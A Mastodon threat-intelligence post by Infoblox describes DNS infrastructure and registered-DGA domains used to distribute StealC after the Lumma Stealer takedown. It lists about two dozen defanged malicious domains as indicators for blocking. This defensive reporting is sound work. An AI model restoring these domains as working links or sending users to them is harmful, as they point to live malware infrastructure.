Infoblox Threat Intel<p>Last week, Microsoft reported that their Digital Crimes Unit (DCU) and international partners disrupted Lumma Stealer by taking down 2,300 domains critical to the malware's operation. Shortly after, Palo Alto's Unit 42 reported about cyber campaigns that previously dropped Lumma Stealer are now distributing StealC infostealer payloads. We analyzed the DNS infrastructure related to the attacks and discovered a large number of malicious registered domain generation algorithm (RDGA) domains. Based on passive DNS, the threat actor that controls the infrastructure configured the domains to a staging environment via a dedicated Panama IP address (self-signed SSL) before deploying them. We identified 144 unique domains in this IP space, and all of them were detected as "suspicious" by our algorithms 1-2 months before they were activated for malicious activity.<br> <br>Disrupting criminal operations is difficult and they will find ways to resurface. However, this example proves that blocking connections at the DNS level can often protect users against the new versions before they emerge. The infostealer actors made a quick turn, but we were already blocking their path. Our specialty is in DNS analytics, so we use DNS signatures, as opposed to malware signatures, for preemptive security. We love this stuff.<br> <br>Here are some examples of the RDGA domains:<br>2323dot2[.]cfd, 2323dot2[.]cyou, 2323dot2[.]my, 232pip1[.]my, 232pip1[.]sbs, 832pip[.]cfd, 832pip[.]cyou, 832pip[.]my, 832pip[.]sbs, b3cloud[.]cfd, b3cloud[.]cyou, b3cloud[.]my, b3cloud[.]sbs, bin48[.]cfd, bin48[.]cyou, bin48[.]my, bin898293[.]cfd, bin898293[.]cyou, bin898293[.]my, bin898293[.]sbs, bit7dl[.]cfd, bit7dl[.]cyou, bit7dl[.]my, bit7dl[.]sbs, bot113cloud[.]cfd, bot113cloud[.]cyou, bot113cloud[.]my<br> <br>These campaigns share similar TTPs with those that we reported several months ago. The threat actor that we discussed in this post (<a href="https://infosec.exchange/@InfobloxThreatIntel/114027715851469775" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@InfobloxThre</span><span class="invisible">atIntel/114027715851469775</span></a>) also distributed Lumma Stealer and used RDGA domains, but incorporated additional components, such as traffic distribution systems (TDS), web trackers, and cloakers.<br> <br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infostealer</span></a> <a href="https://infosec.exchange/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://infosec.exchange/tags/stealc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>stealc</span></a> <a href="https://infosec.exchange/tags/tds" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tds</span></a> <a href="https://infosec.exchange/tags/tracker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tracker</span></a> <a href="https://infosec.exchange/tags/cloaker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cloaker</span></a> <a href="https://infosec.exchange/tags/rdga" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rdga</span></a></p>
TrendingLive feeds
Mastodon is the best way to keep up with what's happening.
Follow anyone across the fediverse and see it all in chronological order. No algorithms, ads, or clickbait in sight.
LoginDrag & drop to upload